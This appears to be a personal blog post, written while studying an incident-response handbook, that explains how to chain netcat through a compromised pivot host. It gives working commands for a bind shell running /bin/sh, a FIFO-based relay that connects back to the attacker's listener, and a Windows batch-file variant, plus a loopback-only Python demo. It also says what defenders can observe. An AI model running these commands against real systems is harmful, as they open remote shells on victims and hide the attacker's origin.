Wednesday, May 20, 2015

Netcat Relay on Linux

I purchased the book "Blue Team Handbook: Incident Response Edition" and it arrived today. I skimmed the whole book and now I am going back through to look closer at a few items that caught my eye. One of them was setting up a netcat relay on Linux.

The netcat relay involves three hosts:
Host 1 - 10.9.9.5 - Attacker
Host 2 - 10.9.9.10 - Compromised victim used as the pivot (relay point)
Host 3 - 10.9.9.15 - Compromised victim that is the real target, reached only through Host 2

On Host 1 you execute: "nc -l -p 4545".  This opens a listening port on your attacking computer; the pivot will connect in to it, so Host 2 must be able to reach Host 1 on port 4545.  The syntax is the traditional netcat's: on netcat builds derived from OpenBSD nc the -e option used below does not exist, and some of them reject -p combined with -l (use "nc -l 4545" there).

On Host 3 you execute: "nc -l -p 2525 -e /bin/sh".  This opens a listening port and, when someone connects, runs /bin/sh with its stdin and stdout attached to the socket, i.e. a bind shell.  The -e option needs a netcat compiled with it (the traditional netcat) or a tool that offers the equivalent, such as ncat's --exec.

Then on Host 2, after both listeners are up, you execute the following commands:
"mknod backpipe p"   # creates a named pipe (FIFO); "mkfifo backpipe" does the same
"nc 10.9.9.5 4545 0<backpipe | nc 10.9.9.15 2525 1>backpipe"

The first nc connects back to the attacker and the second connects to the target.  Whatever the attacker types arrives on the first nc's stdout, which the shell pipe feeds into the second nc's stdin and on to /bin/sh on Host 3.  The shell's output comes out of the second nc's stdout, is written into backpipe, and is read by the first nc as its stdin, so it travels back to the attacker.  The FIFO is needed because an ordinary shell pipe only carries data in one direction.

If a Windows host were the pivot, you would execute the following instead (there is no mknod on Windows, so the second nc is wrapped in a batch file):
"echo nc 10.9.9.15 2525 > relay.bat"  # You need permission to write a file called relay.bat
"nc 10.9.9.5 4545 -e relay.bat"
Here the outer nc connects back to the attacker and runs relay.bat with its stdin and stdout attached to that connection; the nc inside the batch file connects to Host 3, so the two sockets end up joined exactly as in the Linux version.

Commands typed on Host 1 are relayed through Host 2 to Host 3, so Host 3 only ever sees a connection from 10.9.9.10 and the attacker's address never appears in its logs.  From the defender's side the relay is still visible on Host 2 itself: a netstat there shows the outbound connection to 10.9.9.5:4545 alongside the one to 10.9.9.15:2525, and any egress or flow logging will record the connection to the attacker.
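The same data flow written out as a small Python relay with a loopback self-test. This is an added example, not code from this post, the SANS cheat sheet or the Blue Team Handbook: the victim "shell" is a constructed echo service instead of /bin/sh, and 127.0.0.1 with ephemeral ports stands in for the 10.9.9.x hosts so it runs on one machine. It shows what the two nc processes plus backpipe (or relay.bat on Windows) do: the pivot dials out to both ends and copies bytes in both directions, and Host 3 only ever sees the pivot's address as the connecting peer.

```python
import socket
import threading

socket.setdefaulttimeout(5)  # safety net for the loopback demo; never hang forever


def pump(src, dst):
    """Copy bytes src -> dst until src hits EOF, then half-close dst.
    One pump per direction plays the part of one nc in the relay; the
    backpipe FIFO on the page is what joins the two directions."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)  # propagate EOF to the other leg
        except OSError:
            pass


def relay(attacker_addr, victim_addr):
    """Host 2 (pivot): dial OUT to the attacker's listener and OUT to the
    victim's listener, then shuttle bytes both ways. Both listeners must
    already be up, exactly as with the nc version."""
    to_attacker = socket.create_connection(attacker_addr)
    to_victim = socket.create_connection(victim_addr)
    legs = [threading.Thread(target=pump, args=(to_attacker, to_victim), daemon=True),
            threading.Thread(target=pump, args=(to_victim, to_attacker), daemon=True)]
    for t in legs:
        t.start()
    for t in legs:
        t.join()
    to_attacker.close()
    to_victim.close()


def fake_victim_shell(listener, seen_peer):
    """Constructed stand-in for Host 3's "nc -l -p 2525 -e /bin/sh": no real
    shell is spawned; it records who connected and answers every line it
    receives with a canned "executed: <line>" reply."""
    conn, peer = listener.accept()
    seen_peer.append(peer)
    with conn:
        buf = b""
        while True:
            chunk = conn.recv(4096)
            if not chunk:
                break
            buf += chunk
            while b"\n" in buf:
                line, buf = buf.split(b"\n", 1)
                conn.sendall(b"executed: " + line + b"\n")


def run_demo(command=b"id\n"):
    """Stand up the attacker listener (Host 1), the victim listener (Host 3)
    and the relay (Host 2) on 127.0.0.1, send `command` from the attacker end
    and collect the reply. Returns the reply, the peer address the victim saw,
    and the attacker's own listening address for comparison."""
    attacker_listener = socket.socket()
    attacker_listener.bind(("127.0.0.1", 0))
    attacker_listener.listen(1)
    victim_listener = socket.socket()
    victim_listener.bind(("127.0.0.1", 0))
    victim_listener.listen(1)
    attacker_addr = attacker_listener.getsockname()
    victim_addr = victim_listener.getsockname()

    seen_peer = []
    victim = threading.Thread(target=fake_victim_shell, args=(victim_listener, seen_peer), daemon=True)
    pivot = threading.Thread(target=relay, args=(attacker_addr, victim_addr), daemon=True)
    victim.start()
    pivot.start()

    conn, _ = attacker_listener.accept()  # the pivot dialling in to our "nc -l"
    with conn:
        conn.sendall(command)
        conn.shutdown(socket.SHUT_WR)     # done typing; the EOF travels on to Host 3
        reply = b""
        while True:
            chunk = conn.recv(4096)
            if not chunk:
                break
            reply += chunk
    pivot.join()
    victim.join()
    attacker_listener.close()
    victim_listener.close()
    return {"reply": reply, "victim_peer": seen_peer[0], "attacker_addr": attacker_addr}


if __name__ == "__main__":
    result = run_demo(b"id\nuname -a\n")
    print(result["reply"].decode(), end="")
    print("victim saw the connection from", result["victim_peer"],
          "not from the attacker listener at", result["attacker_addr"])
```

The half-close in `pump` is the detail that makes the demo terminate cleanly: when the attacker stops sending, EOF is forwarded to the victim, the victim closes, and that EOF is forwarded back, which is also why the nc relay on the page tears down as soon as either end hangs up.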

Here is a link to the SANS netcat cheat sheet, which also shows how to do this on Windows.

Here is a link to a video that goes through the above scenario using three Linux hosts.  In the book it is a little different because the example uses only an Attacker and a Victim, which also works!
